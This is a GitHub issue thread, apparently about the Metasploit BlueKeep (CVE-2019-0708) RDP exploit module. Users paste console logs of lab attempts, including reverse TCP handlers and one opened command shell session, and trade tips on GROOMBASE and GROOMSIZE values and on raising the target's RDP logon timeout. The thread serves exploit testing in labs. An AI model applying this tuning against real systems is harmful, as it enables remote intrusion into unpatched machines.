Mkv4
commented
5 years ago I tried with win7 x64 Enterprise 6.1.7600 and Virtualbox 6.0.10 r132072 (Qt5.6.2)for win also had this problem.
Closed MazX0p closed 5 years ago
Mkv4
commented
5 years ago I tried with win7 x64 Enterprise 6.1.7600 and Virtualbox 6.0.10 r132072 (Qt5.6.2)for win also had this problem.
keisentraut
commented
5 years ago The hardcoded value of GROOMBASE for VirtualBox value was wrong for me, too when eploiting Win7 SP1 Build 7601 on Virtualbox 6.0 with Win10 host. I didn't understand the exploit in detail, but I think GROOMBASE simply needs to be the start address of the NonPagedPool. I found this address by dumping the memory with VBoxManage and then running rekall as suggested by KevTheHermit on Twitter. Please see my blog for details how I did it.
I had to reduce GROOMSIZE from the default of 250 to 50, too. I think the reason was that my VM had kind of limited RAM (2GB) assigned and 250 MB of grooming is too much, therefore the connection is reset before the actual exploit is triggered.
aoprea1982
commented
5 years ago @ keisentraut what windows7 are you using? Professional or Ultimate?
Your steps from the blog are working, But keep getting bluescreens.
Im using Win7 x64 SP1 Build 7601 Ultimate in virtualbox 6.10.12
[*] Started reverse TCP handler on 192.168.10.12:4444
[*] 192.168.10.11:3389 - Detected RDP on 192.168.10.11:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.10.11:3389 - The target is vulnerable.
[*] 192.168.10.11:3389 - Using CHUNK grooming strategy. Size 180MB, target address 0xfa800cc80000, Channel count 1.
[*] 192.168.10.11:3389 - Surfing channels ...
[*] 192.168.10.11:3389 - Lobbing eggs ...
[*] 192.168.10.11:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created. => blue screen on the target changed GROOMBASE to start of NonPagedPool in the exploit .rb played with GROOMSIZE values
you said 50 but the blog shows 250 still when success
[*] 192.168.137.102:3389 - Using CHUNK grooming strategy. !!!!!! 250 not 50 => Size 250MB, !!!!!!!!target address !0xfffffa8016400000, Channel count 1.
[*] 192.168.137.102:3389 - Surfing channels ...
[*] 192.168.137.102:3389 - Lobbing eggs ...
[*] 192.168.137.102:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 2 opened (192.168.137.101:4444 -> 192.168.137.102:49169 at 2019-09-09 19:54:59 +0200)
newxianlife
commented
5 years ago @ keisentraut what windows7 are you using? Professional or Ultimate?
Your steps from the blog are working, But keep getting bluescreens.
Im using Win7 x64 SP1 Build 7601 Ultimate in virtualbox 6.10.12
""" [] Started reverse TCP handler on 192.168.10.12:4444 [] 192.168.10.11:3389 - Detected RDP on 192.168.10.11:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.10.11:3389 - The target is vulnerable. [] 192.168.10.11:3389 - Using CHUNK grooming strategy. Size 180MB, target address 0xfa800cc80000, Channel count 1. [] 192.168.10.11:3389 - Surfing channels ... [] 192.168.10.11:3389 - Lobbing eggs ... [] 192.168.10.11:3389 - Forcing the USE of FREE'd object ... [*] Exploit completed, but no session was created. => blue screen on the target
"""
changed GROOMBASE to start of NonPagedPool in the exploit .rb played with GROOMSIZE values
you said 50 but the blog shows 250 still when success
""" [] 192.168.137.102:3389 - Using CHUNK grooming strategy. !!!!!! 250 not 50 => Size 250MB, !!!!!!!!target address !0xfffffa8016400000, Channel count 1. [] 192.168.137.102:3389 - Surfing channels ... [] 192.168.137.102:3389 - Lobbing eggs ... [] 192.168.137.102:3389 - Forcing the USE of FREE'd object ... [*] Command shell session 2 opened (192.168.137.101:4444 -> 192.168.137.102:49169 at 2019-09-09 19:54:59 +0200) """
i got the same issue Exploit completed, but no session was created.
MazX0p
commented
5 years ago The hardcoded value of GROOMBASE for VirtualBox value was wrong for me, too when eploiting Win7 SP1 Build 7601 on Virtualbox 6.0 with Win10 host. I didn't understand the exploit in detail, but I think GROOMBASE simply needs to be the start address of the NonPagedPool. I found this address by dumping the memory with
VBoxManageand then runningrekallas suggested by KevTheHermit on Twitter. Please see my blog for details how I did it.I had to reduce GROOMSIZE from the default of 250 to 50, too. I think the reason was that my VM had kind of limited RAM (2GB) assigned and 250 MB of grooming is too much, therefore the connection is reset before the actual exploit is triggered.
thank you, but i try on my wn-7 machine and it,s still didn,t work .
MazX0p
commented
5 years ago [*] Started reverse TCP handler on x.x.x.x:4444
[*] x.x.x.x:3389 - Detected RDP on x.x.x.x:3389 (Windows version: 6.1.7600) (Requires NLA: No)
[+] x.x.x.x:3389 - The target is vulnerable.
[*] x.x.x.x:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa8009c00000, Channel count 1.
[*] x.x.x.x:3389 - Surfing channels ...
[*] 1x.x.x.x:3389 - Lobbing eggs ...
[-] x.x.x.x:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
dudumao520
commented
5 years ago msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > [*] 192.168.1.176:3389 - Detected RDP on 192.168.1.176:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.1.176:3389 - The target is vulnerable.
[*] 192.168.1.176:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 192.168.1.176:3389 - Surfing channels ...
[*] 192.168.1.176:3389 - Lobbing eggs ...
[-] 192.168.1.176:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
zablah
commented
5 years ago I have the same issue tested on windows 7 ultimate 64bit virtual box
[*] Started reverse TCP handler on 192.168.10.3:4444
[*] 192.168.10.17:3389 - Detected RDP on 192.168.10.17:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.10.17:3389 - The target is vulnerable.
[*] 192.168.10.17:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.10.17:3389 - Surfing channels ...
[*] 192.168.10.17:3389 - Lobbing eggs ...
[-] 192.168.10.17:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
I was using the following setup:
If you get "Connection reset", try changing GROOMSIZE. If you get BSODs, check if your GROOMBASE is correct. I only roughly understand the exploit, and do not intend to do more investigating, sry.
PS: I "faked" the MetaSploit output, because I did write the blog article on another machine, that's why the output shows the not working 250MB. Please note that there is nothing special about the 50MB, I just tried different values until it worked.
zablah
commented
5 years ago @keisentraut can you share the GROOMBASE and GROOMSIZE values ? also can you explain how you find the correct values ?
stountop
commented
5 years ago Windows will disconnect RDP logon attempt if there is no user activities in the RDP logon window for a while. The default timeout for Windows Server 2003 is 120 seconds; the timeout for Windows Server 2008 R2/Win7 is 30 seconds. If the exploit does not send all the packets during this time, it will failed with this error. To tests targets in low-bandwidth networks, you may add the following registry value to configure the timeout on the target system: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp Name: LogonTimeout (DWORD) Decimal Value: 300 # 5 minutes
busterb
commented
5 years ago We added a few more targets before landing the module that might help (though they might not depending on the situation). I'm going to close this issue as is, let's work from the module that's in tree. I think probably PRs to improve module documentation would be very welcome!
BaelTD
commented
5 years ago hello i have the same issue. i have tried to change groombase : Setting the groombase that was before the update, and chunk size : 50 MB Blue Screen on Target, 80 MB Blue Screen on Target, 100 MB Blue Screen on Target, 150 MB Blue Screen on Target, 180 MB Blue Screen on Target, 200 MB Blue Screen on Target, 250 MB Forcing the USE of FREE'd object --> Blue Screen on Target. My target is : Win7 SP1 Ultimate 2 gb ram 2 core.
using 250 MB chunk the exploit go next but don't open a reverse TCP to the target.
Terminal: [] Started reverse TCP handler on 192.168.5.:4444 [+] 192.168.5.:3389 - The target is vulnerable. [] 192.168.5.:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [] 192.168.5.:3389 - Surfing channels ... [] 192.168.5.:3389 - Lobbing eggs ... [] 192.168.5.:3389 - Forcing the USE of FREE'd object ... [] Exploit completed, but no session was created.
z0r0-max
commented
5 years ago I'm having the same issue, when i choose Groomsize to 1 MB, it says Exploit Completed but no session was created. if i choose more Groomsize like 2 - 50 - 100 - 150 - 200 - 250 i got Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer.
is there any solutions ? I'm trying on Windows 7 Pro.
MzzdToT
commented
4 years ago bad guy, fk u man!
Rhaal
commented
4 years ago Running the exploit on a Windows Server 2008 R2 x64 machine with a Groomsize of 1MB will kill it: as soon as I get a physical hold of the system I'll tell you if it's BSOD or it caught fire and released a swarm of locusts
AoG22
commented
4 years ago any one solved it ?
mohds
commented
3 years ago still an issue
This is also the case when I try a physical machine.
Originally posted by @a62rzn in https://github.com/rapid7/metasploit-framework/pull/12283#issuecomment-529361538